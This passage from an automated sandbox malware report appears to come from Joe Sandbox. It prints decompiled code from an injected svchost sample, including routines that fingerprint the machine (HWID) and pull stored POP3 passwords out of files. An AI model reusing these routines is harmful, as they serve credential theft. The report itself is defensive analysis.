				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				char _v252;
				signed char _v253;
				CHAR* _v260;
				signed int _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				int _t43;
				signed char _t49;
				intOrPtr _t65;
				CHAR* _t66;
				void* _t73;
				WCHAR* _t74;
				void* _t76;
				signed int _t79;
				void* _t80;

				_t73 = __edx;
				_t40 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t40 ^ _t79;
				_t74 = __ecx;
				_v260 = _a4;
				_t43 = lstrlenW(__ecx);
				_t65 = 0;
				_t5 = _t43 + 2; // 0x2
				_t76 = _t43 + _t5;
				_v252 = 0x67452301;
				_v248 = 0xefcdab89;
				_v244 = 0x98badcfe;
				_v240 = 0x10325476;
				_v236 = 0xc3d2e1f0;
				_v228 = 0;
				_v232 = 0;
				if(_t76 > 0) {
					do {
						E0BC08768(1,  &_v252, _t65 + _t74);
						_t65 = _t65 + 1;
					} while (_t65 < _t76);
				}
				E0BC087FE(_t65, _t74,  &_v252,  &_v32);
				_v12 = 0;
				E0BC08D5E( &_v160,  &_v160, 0, 0x80);
				_v264 = _v264 & 0x00000000;
				_v253 = 0;
				_t66 = "%s%2.2X";
				do {
					_t49 =  *((intOrPtr*)(_t79 + _v264 - 0x1c));
					_v253 = _v253 + _t49;
					wsprintfA( &_v160, _t66, _v260, _t49 & 0x000000ff);
					_t80 = _t80 + 0x10;
					lstrcpyA(_v260,  &_v160);
					_v264 = _v264 + 1;
				} while (_v264 < 0x14);
				wsprintfA( &_v160, _t66, _v260, _v253 & 0x000000ff);
				return E0BC09FDC(lstrcpyA(_v260,  &_v160), _t66, _v8 ^ _t79, _t73, lstrcpyA, wsprintfA);
			}






























                                                                                                                                        0x0bc04f4f
                                                                                                                                        0x0bc04f58
                                                                                                                                        0x0bc04f5f
                                                                                                                                        0x0bc04f68
                                                                                                                                        0x0bc04f6b
                                                                                                                                        0x0bc04f71
                                                                                                                                        0x0bc04f77
                                                                                                                                        0x0bc04f79
                                                                                                                                        0x0bc04f79
                                                                                                                                        0x0bc04f7d
                                                                                                                                        0x0bc04f87
                                                                                                                                        0x0bc04f91
                                                                                                                                        0x0bc04f9b
                                                                                                                                        0x0bc04fa5
                                                                                                                                        0x0bc04faf
                                                                                                                                        0x0bc04fb5
                                                                                                                                        0x0bc04fbd
                                                                                                                                        0x0bc04fbf
                                                                                                                                        0x0bc04fcc
                                                                                                                                        0x0bc04fd1
                                                                                                                                        0x0bc04fd3
                                                                                                                                        0x0bc04fbf
                                                                                                                                        0x0bc04fe1
                                                                                                                                        0x0bc04ff5
                                                                                                                                        0x0bc04ff9
                                                                                                                                        0x0bc04ffe
                                                                                                                                        0x0bc05011
                                                                                                                                        0x0bc05018
                                                                                                                                        0x0bc0501d
                                                                                                                                        0x0bc05023
                                                                                                                                        0x0bc05027
                                                                                                                                        0x0bc0503f
                                                                                                                                        0x0bc05041
                                                                                                                                        0x0bc05051
                                                                                                                                        0x0bc05053
                                                                                                                                        0x0bc05059
                                                                                                                                        0x0bc05078
                                                                                                                                        0x0bc0509a

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpywsprintf$lstrlen
                                                                                                                                        • String ID: %s%2.2X
                                                                                                                                        • API String ID: 2096257294-1682948137
                                                                                                                                        • Opcode ID: 711bf3937afca3ddd4eb9fe0e245c113b6c9a1482a1f98972c45afc74eb7996c
                                                                                                                                        • Instruction ID: 3e0829cf73d18436222062265a51f12dfe80f85fbd99150cccf6f58dda5ae8c5
                                                                                                                                        • Opcode Fuzzy Hash: 711bf3937afca3ddd4eb9fe0e245c113b6c9a1482a1f98972c45afc74eb7996c
                                                                                                                                        • Instruction Fuzzy Hash: CE312A71C202299FDB21DB68CC80BEEBBB9EB14304F4140E6E559A7241EA719F849F60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.25%

                                                                                                                                        Function 0BC0962F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                        			E0BC0962F(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				char _v276;
				long _v280;
				void* _v284;
				intOrPtr _v288;
				signed int _v292;
				intOrPtr _v296;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				void** _t27;
				intOrPtr _t33;
				void* _t34;
				void* _t54;
				intOrPtr _t55;
				signed int _t57;

				_t54 = __edx;
				_t49 = __ecx;
				_t22 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t22 ^ _t57;
				_v292 = _v292 & 0x00000000;
				_t55 = __ecx;
				_v280 = GetTickCount();
				asm("rol eax, 0xb");
				_v280 =  !_v280;
				_t27 =  &_v284;
				__imp__GetHGlobalFromStream(_t55, _t27);
				if(_t27 >= 0) {
					_t33 = E0BC089A1(_t55, _t49);
					_t56 = _t33;
					_v296 = _t33;
					_t34 = GlobalLock(_v284);
					_t48 = _t34;
					if(_t34 != 0) {
						_v288 = E0BC08D51(_t56);
						E0BC08D91(_t48, _t36, _t56);
						GlobalUnlock(_v284);
						E0BC094CA(E0BC09469( &_v276, _t49,  &_v280, 4), _t49, _v288, _t56);
						_t56 = _t55;
						E0BC08B39(_t55);
						_t48 =  &_v280;
						E0BC08A41( &_v280, _t49, _t55, 4);
						_v292 = E0BC08C4D(_v288, _t49, _v296);
						E0BC08D3D(_v288);
					}
				}
				E0BC08B27(_t55);
				return E0BC09FDC(_v292, _t48, _v8 ^ _t57, _t54, _t55, _t56);
			}




















                                                                                                                                        0x0bc0962f
                                                                                                                                        0x0bc0962f
                                                                                                                                        0x0bc09638
                                                                                                                                        0x0bc0963f
                                                                                                                                        0x0bc09642
                                                                                                                                        0x0bc0964c
                                                                                                                                        0x0bc09654
                                                                                                                                        0x0bc09660
                                                                                                                                        0x0bc09665
                                                                                                                                        0x0bc0966b
                                                                                                                                        0x0bc09673
                                                                                                                                        0x0bc0967b
                                                                                                                                        0x0bc09683
                                                                                                                                        0x0bc0968e
                                                                                                                                        0x0bc09690
                                                                                                                                        0x0bc09696
                                                                                                                                        0x0bc0969c
                                                                                                                                        0x0bc096a0
                                                                                                                                        0x0bc096ac
                                                                                                                                        0x0bc096b2
                                                                                                                                        0x0bc096bd
                                                                                                                                        0x0bc096de
                                                                                                                                        0x0bc096e3
                                                                                                                                        0x0bc096e5
                                                                                                                                        0x0bc096ec
                                                                                                                                        0x0bc096f2
                                                                                                                                        0x0bc09712
                                                                                                                                        0x0bc09718
                                                                                                                                        0x0bc0971d
                                                                                                                                        0x0bc096a0
                                                                                                                                        0x0bc09720
                                                                                                                                        0x0bc09739

                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 0BC0964E
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?), ref: 0BC09673
                                                                                                                                        • GlobalLock.KERNEL32 ref: 0BC09696
                                                                                                                                          • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
                                                                                                                                          • Part of subcall function 0BC08D91: GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
                                                                                                                                          • Part of subcall function 0BC08D91: GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
                                                                                                                                        • GlobalUnlock.KERNEL32(?,00000000,00000000,00000000), ref: 0BC096BD
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$Local$AddressAllocCountFreeFromHandleLockModuleProcStreamTickUnlock
                                                                                                                                        • String ID: 1.00
                                                                                                                                        • API String ID: 642211338-2728340845
                                                                                                                                        • Opcode ID: f8314b9ca7c95b0b182e12541c6c8e5bae01512e0b2d5c3d10800383ee5df74c
                                                                                                                                        • Instruction ID: 9594188d77cc188793f9d7bd72385e176d9af92e852eccf08088d7aab594f433
                                                                                                                                        • Opcode Fuzzy Hash: f8314b9ca7c95b0b182e12541c6c8e5bae01512e0b2d5c3d10800383ee5df74c
                                                                                                                                        • Instruction Fuzzy Hash: 9F214F7192021C9FCF25AB68DC46BDDB7B8EF08710F0041D5A608E2180DF748E859E91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.20%

                                                                                                                                        Function 0BC0914B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50stringUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                        			E0BC0914B(CHAR* _a4) {
				int _t7;
				char* _t8;
				char* _t9;
				CHAR* _t16;

				_t16 = E0BC08EE2(0xbc0d832, _a4);
				_t7 = lstrlenA(_a4);
				if(_t7 > 1 &&  *_t16 == 0x22) {
					_push(_t7);
					_t3 =  &(_t16[1]); // 0x1
					_push(_t16);
					E0BC08DBD();
				}
				_t8 = StrStrIA(_t16, ".exe");
				if(_t8 != 0) {
					_t8[4] = 0;
				}
				_t9 = StrRChrIA(_t16, 0, 0x5c);
				if(_t9 == 0) {
					 *_t16 = 0;
				} else {
					 *_t9 = 0;
				}
				if(lstrlenA(_t16) <= 3) {
					 *_t16 = 0;
				}
				return _t16;
			}







                                                                                                                                        0x0bc09168
                                                                                                                                        0x0bc0916a
                                                                                                                                        0x0bc0916f
                                                                                                                                        0x0bc09176
                                                                                                                                        0x0bc09177
                                                                                                                                        0x0bc0917b
                                                                                                                                        0x0bc0917c
                                                                                                                                        0x0bc09181
                                                                                                                                        0x0bc0918a
                                                                                                                                        0x0bc09194
                                                                                                                                        0x0bc09196
                                                                                                                                        0x0bc09196
                                                                                                                                        0x0bc0919d
                                                                                                                                        0x0bc091a5
                                                                                                                                        0x0bc091ab
                                                                                                                                        0x0bc091a7
                                                                                                                                        0x0bc091a7
                                                                                                                                        0x0bc091a7
                                                                                                                                        0x0bc091b3
                                                                                                                                        0x0bc091b5
                                                                                                                                        0x0bc091b5
                                                                                                                                        0x0bc091bd

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(00000000,HWID,?,?), ref: 0BC08F07
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(HWID), ref: 0BC08F0C
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcpyA.KERNEL32(00000000,00000000), ref: 0BC08F1D
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcatA.KERNEL32(00000000,HWID), ref: 0BC08F25
                                                                                                                                        • lstrlenA.KERNEL32(0BC068DE,00000000,?,?,?,0BC068DE,00000000), ref: 0BC0916A
                                                                                                                                        • StrStrIA.SHLWAPI(00000000,.exe,?,?,?,0BC068DE,00000000), ref: 0BC0918A
                                                                                                                                        • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,?,?,?,0BC068DE,00000000), ref: 0BC0919D
                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,0BC068DE,00000000), ref: 0BC091AE
                                                                                                                                          • Part of subcall function 0BC08DBD: GetModuleHandleA.KERNEL32(ntdll.dll,?,0BC021FD,?,?,?), ref: 0BC08DC5
                                                                                                                                          • Part of subcall function 0BC08DBD: GetProcAddress.KERNEL32(00000000,memcpy), ref: 0BC08DD1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$AddressHandleModuleProclstrcatlstrcpy
                                                                                                                                        • String ID: .exe
                                                                                                                                        • API String ID: 3034646300-4119554291
                                                                                                                                        • Opcode ID: 22a8ef47103fa7b18f288b1a67cac3645652fb596d47da184684b162485914b4
                                                                                                                                        • Instruction ID: 6877c55ffbb657fa5f7315fb1a626d666a9d7bd8c565c41f0b4581f62b9537e2
                                                                                                                                        • Opcode Fuzzy Hash: 22a8ef47103fa7b18f288b1a67cac3645652fb596d47da184684b162485914b4
                                                                                                                                        • Instruction Fuzzy Hash: 96014922276295BED3222BACAC48D9FBFCDDF820507144569F180C71C2CEB28A40C7B1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC010D8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                        			E0BC010D8(void* __esi, intOrPtr _a4) {
				void* _v8;
				void* __ecx;
				void** _t8;
				void* _t21;
				char* _t22;
				void* _t25;
				void* _t27;
				char* _t28;

				_t8 =  &_v8;
				_t22 = 0;
				_t28 = 0;
				__imp__GetHGlobalFromStream(_a4, _t8, _t27, _t21, _t25);
				if(_t8 >= 0) {
					_t4 = E0BC089A1(_a4, _t25) + 1; // 0x1
					_t28 = E0BC08D51(_t4);
					if(GlobalLock(_v8) != 0) {
						E0BC08D91(_t18, _t28, _t31);
						GlobalUnlock(_v8);
					}
				}
				E0BC08B27(_a4);
				if(_t28 != 0) {
					if(StrStrIA(_t28, "STATUS_OK") != 0) {
						_t22 = 1;
					}
					E0BC08D3D(_t28);
				}
				return _t22;
			}











                                                                                                                                        0x0bc010de
                                                                                                                                        0x0bc010e5
                                                                                                                                        0x0bc010e7
                                                                                                                                        0x0bc010e9
                                                                                                                                        0x0bc010f1
                                                                                                                                        0x0bc010fe
                                                                                                                                        0x0bc01109
                                                                                                                                        0x0bc01113
                                                                                                                                        0x0bc01118
                                                                                                                                        0x0bc01120
                                                                                                                                        0x0bc01120
                                                                                                                                        0x0bc01126
                                                                                                                                        0x0bc0112a
                                                                                                                                        0x0bc01131
                                                                                                                                        0x0bc01141
                                                                                                                                        0x0bc01145
                                                                                                                                        0x0bc01145
                                                                                                                                        0x0bc01147
                                                                                                                                        0x0bc0114c
                                                                                                                                        0x0bc01152

                                                                                                                                        APIs
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,?,00000000,?,?,0BC0138D,?), ref: 0BC010E9
                                                                                                                                        • StrStrIA.SHLWAPI(00000000,STATUS_OK,?,00000000,?,?,0BC0138D,?), ref: 0BC01139
                                                                                                                                          • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
                                                                                                                                        • GlobalLock.KERNEL32 ref: 0BC0110B
                                                                                                                                          • Part of subcall function 0BC08D91: GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
                                                                                                                                          • Part of subcall function 0BC08D91: GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
                                                                                                                                        • GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,0BC0138D,?), ref: 0BC01120
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AddressAllocFromHandleLocalLockModuleProcStreamUnlock
                                                                                                                                        • String ID: STATUS_OK
                                                                                                                                        • API String ID: 2225746120-3516785317
                                                                                                                                        • Opcode ID: a6e62e1cd341e8eefdb64749a0c294964da14a123ef0ad67da8e01472476c8e3
                                                                                                                                        • Instruction ID: 55289fbdfa818523daa31d85de2747c0b4a240b1830fb34675d1da2e03028954
                                                                                                                                        • Opcode Fuzzy Hash: a6e62e1cd341e8eefdb64749a0c294964da14a123ef0ad67da8e01472476c8e3
                                                                                                                                        • Instruction Fuzzy Hash: 7101D132234205BF9F116FA5DC89DAFBBFDEE856947054239F902E20C0DF74DA01AA60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        Function 0BC08F32, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC08F32(CHAR* _a4, CHAR* _a8) {
				int _t13;
				CHAR* _t25;

				if(_a4 == 0) {
					_a4 = 0xbc0d832;
				}
				if(_a8 == 0) {
					_a8 = 0xbc0d832;
				}
				_t13 = lstrlenA(_a4);
				_t25 = E0BC08D51(lstrlenA(_a8) + _t13 + 1);
				lstrcpyA(_t25, _a4);
				lstrcatA(_t25, _a8);
				if(_a4 != 0xbc0d832) {
					E0BC08D3D(_a4);
				}
				return _t25;
			}





                                                                                                                                        0x0bc08f41
                                                                                                                                        0x0bc08f43
                                                                                                                                        0x0bc08f43
                                                                                                                                        0x0bc08f4a
                                                                                                                                        0x0bc08f4c
                                                                                                                                        0x0bc08f4c
                                                                                                                                        0x0bc08f58
                                                                                                                                        0x0bc08f6d
                                                                                                                                        0x0bc08f70
                                                                                                                                        0x0bc08f7a
                                                                                                                                        0x0bc08f83
                                                                                                                                        0x0bc08f88
                                                                                                                                        0x0bc08f8d
                                                                                                                                        0x0bc08f94

                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
                                                                                                                                        • lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcatlstrcpy
                                                                                                                                        • String ID: HWID
                                                                                                                                        • API String ID: 2414487701-1176364606
                                                                                                                                        • Opcode ID: b175aa8880999ee149d541f7e05ae1150fc1fe3f8b56fb0d64109416aa030e7b
                                                                                                                                        • Instruction ID: c6b0a183c93223df74ed0003c9f5084c9454422b450987c55b47bad49ac07ebe
                                                                                                                                        • Opcode Fuzzy Hash: b175aa8880999ee149d541f7e05ae1150fc1fe3f8b56fb0d64109416aa030e7b
                                                                                                                                        • Instruction Fuzzy Hash: C0F0373192521CAFCF115FA5EC44A9A7FAAEF402A4F10C226FD088A160CB758B50DF94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.58%

                                                                                                                                        Function 0BC08EE2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC08EE2(CHAR* __eax, CHAR* _a4) {
				int _t9;
				CHAR* _t16;
				CHAR* _t19;

				_t16 = __eax;
				if(_a4 == 0) {
					_a4 = 0xbc0d832;
				}
				if(_t16 == 0) {
					_t16 = 0xbc0d832;
				}
				_t9 = lstrlenA(_a4);
				_t19 = E0BC08D51(lstrlenA(_t16) + _t9 + 1);
				lstrcpyA(_t19, _a4);
				lstrcatA(_t19, _t16);
				return _t19;
			}






                                                                                                                                        0x0bc08eeb
                                                                                                                                        0x0bc08ef3
                                                                                                                                        0x0bc08ef5
                                                                                                                                        0x0bc08ef5
                                                                                                                                        0x0bc08efa
                                                                                                                                        0x0bc08efc
                                                                                                                                        0x0bc08efc
                                                                                                                                        0x0bc08f07
                                                                                                                                        0x0bc08f1a
                                                                                                                                        0x0bc08f1d
                                                                                                                                        0x0bc08f25
                                                                                                                                        0x0bc08f31

                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(00000000,HWID,?,?), ref: 0BC08F07
                                                                                                                                        • lstrlenA.KERNEL32(HWID), ref: 0BC08F0C
                                                                                                                                        • lstrcpyA.KERNEL32(00000000,00000000), ref: 0BC08F1D
                                                                                                                                        • lstrcatA.KERNEL32(00000000,HWID), ref: 0BC08F25
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcatlstrcpy
                                                                                                                                        • String ID: HWID
                                                                                                                                        • API String ID: 2414487701-1176364606
                                                                                                                                        • Opcode ID: 6e3849a6e53596f185c367c6906acbb017d453c4392264a267a9f9e37f734692
                                                                                                                                        • Instruction ID: 6d2ff51ecce3cd8e8a0e514d0078dc1dac716aed594e44700ded4e531cd7a3d9
                                                                                                                                        • Opcode Fuzzy Hash: 6e3849a6e53596f185c367c6906acbb017d453c4392264a267a9f9e37f734692
                                                                                                                                        • Instruction Fuzzy Hash: 86F0A7716216296FDB101FA8EC84AAA7FDCEF151A4B118232FE08C7220DB70DE008BD4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.58%

                                                                                                                                        Function 0BC055D9, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 133stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                        			E0BC055D9(void* __eflags, intOrPtr _a4, CHAR* _a8) {
				unsigned int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				CHAR* _v24;
				char* _v28;
				intOrPtr _v32;
				char _v36;
				unsigned int _v40;
				intOrPtr _v44;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t42;
				intOrPtr _t45;
				char* _t46;
				char* _t47;
				char* _t54;
				intOrPtr _t59;
				char _t60;
				void* _t62;
				void* _t78;
				void* _t80;
				void* _t81;
				void* _t86;
				void* _t88;
				unsigned int _t93;
				CHAR* _t101;

				_t42 = E0BC090FC(_a8);
				if(_t42 == 0) {
					L20:
					return _t42;
				}
				_t42 = E0BC08FF4( &_v52, _a8);
				_pop(_t78);
				if(_t42 != 0) {
					_t45 = E0BC09BE0(_t78, _v44, _v40 >> 1);
					_pop(_t80);
					_v16 = _t45;
					if(_t45 == 0) {
						_v16 = E0BC08D51(_v40);
						E0BC08D91(_v44, _t71, _v40);
					}
					_push("<POP3_Password2");
					_push(_v16);
					while(1) {
						_t46 = StrStrA();
						if(_t46 == 0) {
							break;
						}
						_t47 = StrStrIA(_t46, ">");
						if(_t47 == 0) {
							break;
						}
						_t12 =  &(_t47[1]); // 0x1
						_t101 = _t12;
						_v24 = _t101;
						_t54 = StrStrA(_t101, "</");
						_v28 = _t54;
						if(_t54 == 0) {
							break;
						}
						 *_t54 = 0;
						_t93 = lstrlenA(_t101);
						if(_t93 != 0) {
							_v12 = E0BC091E5(_t101);
							if(E0BC09C7F(_t80, _t56, _t93) != 0) {
								_t59 =  *0xbc10d2c; // 0x0
								_v32 = _t59;
								_t60 =  *0xbc10d64; // 0x0
								_v36 = _t60;
								_v8 = _t93 >> 1;
								_t62 = E0BC021B7(_v12,  &_v8,  &_v36);
								_pop(_t86);
								if(_t62 != 0) {
									_v20 = 0xbeef0001;
									E0BC08A41( &_v20, _t86, _a4, 4);
									E0BC08C6D(_a4, _t86, _v24);
									_pop(_t88);
									E0BC08C37(_v8);
									if(_v8 != 0 && _v12 != 0) {
										E0BC08C4D(_v12, _t88, _v8);
									}
								}
							}
							E0BC08D3D(_v12);
							_pop(_t80);
						}
						_push("<POP3_Password2");
						_push(_v28);
					}
					_v28 = 0xbeef0002;
					E0BC08A41( &_v28, _t80, _a4, 4);
					_pop(_t81);
					E0BC08C37(_v40);
					if(_v40 != 0) {
						_t52 = _v44;
						if(_v44 != 0) {
							E0BC08C4D(_t52, _t81, _v40);
						}
					}
					E0BC08D3D(_v16);
					_t42 = E0BC0907F( &_v52);
				}
			}
































                                                                                                                                        0x0bc055e5
                                                                                                                                        0x0bc055ec
                                                                                                                                        0x0bc05769
                                                                                                                                        0x0bc0576d
                                                                                                                                        0x0bc0576d
                                                                                                                                        0x0bc055f8
                                                                                                                                        0x0bc055fd
                                                                                                                                        0x0bc05600
                                                                                                                                        0x0bc0560f
                                                                                                                                        0x0bc05615
                                                                                                                                        0x0bc05616
                                                                                                                                        0x0bc0561b
                                                                                                                                        0x0bc05628
                                                                                                                                        0x0bc0562f
                                                                                                                                        0x0bc0562f
                                                                                                                                        0x0bc05634
                                                                                                                                        0x0bc05639
                                                                                                                                        0x0bc05717
                                                                                                                                        0x0bc05717
                                                                                                                                        0x0bc0571f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc05647
                                                                                                                                        0x0bc0564f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc05655
                                                                                                                                        0x0bc05655
                                                                                                                                        0x0bc0565e
                                                                                                                                        0x0bc05661
                                                                                                                                        0x0bc05667
                                                                                                                                        0x0bc0566c
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc05673
                                                                                                                                        0x0bc0567c
                                                                                                                                        0x0bc05680
                                                                                                                                        0x0bc0568f
                                                                                                                                        0x0bc0569b
                                                                                                                                        0x0bc0569d
                                                                                                                                        0x0bc056a2
                                                                                                                                        0x0bc056a5
                                                                                                                                        0x0bc056ac
                                                                                                                                        0x0bc056b2
                                                                                                                                        0x0bc056bc
                                                                                                                                        0x0bc056c1
                                                                                                                                        0x0bc056c4
                                                                                                                                        0x0bc056ce
                                                                                                                                        0x0bc056d5
                                                                                                                                        0x0bc056df
                                                                                                                                        0x0bc056e8
                                                                                                                                        0x0bc056e9
                                                                                                                                        0x0bc056f2
                                                                                                                                        0x0bc05700
                                                                                                                                        0x0bc05705
                                                                                                                                        0x0bc056f2
                                                                                                                                        0x0bc056c4
                                                                                                                                        0x0bc05709
                                                                                                                                        0x0bc0570e
                                                                                                                                        0x0bc0570e
                                                                                                                                        0x0bc0570f
                                                                                                                                        0x0bc05714
                                                                                                                                        0x0bc05714
                                                                                                                                        0x0bc0572d
                                                                                                                                        0x0bc05734
                                                                                                                                        0x0bc0573c
                                                                                                                                        0x0bc0573d
                                                                                                                                        0x0bc05746
                                                                                                                                        0x0bc05748
                                                                                                                                        0x0bc0574d
                                                                                                                                        0x0bc05752
                                                                                                                                        0x0bc05757
                                                                                                                                        0x0bc0574d
                                                                                                                                        0x0bc0575b
                                                                                                                                        0x0bc05764
                                                                                                                                        0x0bc05764

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC090FC: CreateFileA.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,0BC01F1F), ref: 0BC09112
                                                                                                                                          • Part of subcall function 0BC090FC: FindCloseChangeNotification.KERNELBASE(00000000), ref: 0BC0911E
                                                                                                                                          • Part of subcall function 0BC08FF4: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000000,00000010,00000000,?,?,0BC01F2C,00000000), ref: 0BC09013
                                                                                                                                        • StrStrA.SHLWAPI(?,<POP3_Password2), ref: 0BC05717
                                                                                                                                          • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
                                                                                                                                          • Part of subcall function 0BC08D91: GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
                                                                                                                                          • Part of subcall function 0BC08D91: GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
                                                                                                                                        • StrStrIA.SHLWAPI(00000000,0BC0D6D8), ref: 0BC05647
                                                                                                                                        • StrStrA.SHLWAPI(00000001,0BC0D6D4), ref: 0BC05661
                                                                                                                                        • lstrlenA.KERNEL32(00000001), ref: 0BC05676
                                                                                                                                          • Part of subcall function 0BC091E5: lstrlenA.KERNEL32(0BC01A75,00000000,?,0BC01A75,00000000), ref: 0BC091EC
                                                                                                                                          • Part of subcall function 0BC091E5: lstrcpyA.KERNEL32(00000000,0BC01A75,?,0BC01A75,00000000), ref: 0BC091FE
                                                                                                                                          • Part of subcall function 0BC021B7: LocalFree.KERNEL32(?), ref: 0BC02208
                                                                                                                                          • Part of subcall function 0BC08C6D: lstrlenA.KERNEL32(00000000,00000000,?), ref: 0BC08C7D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
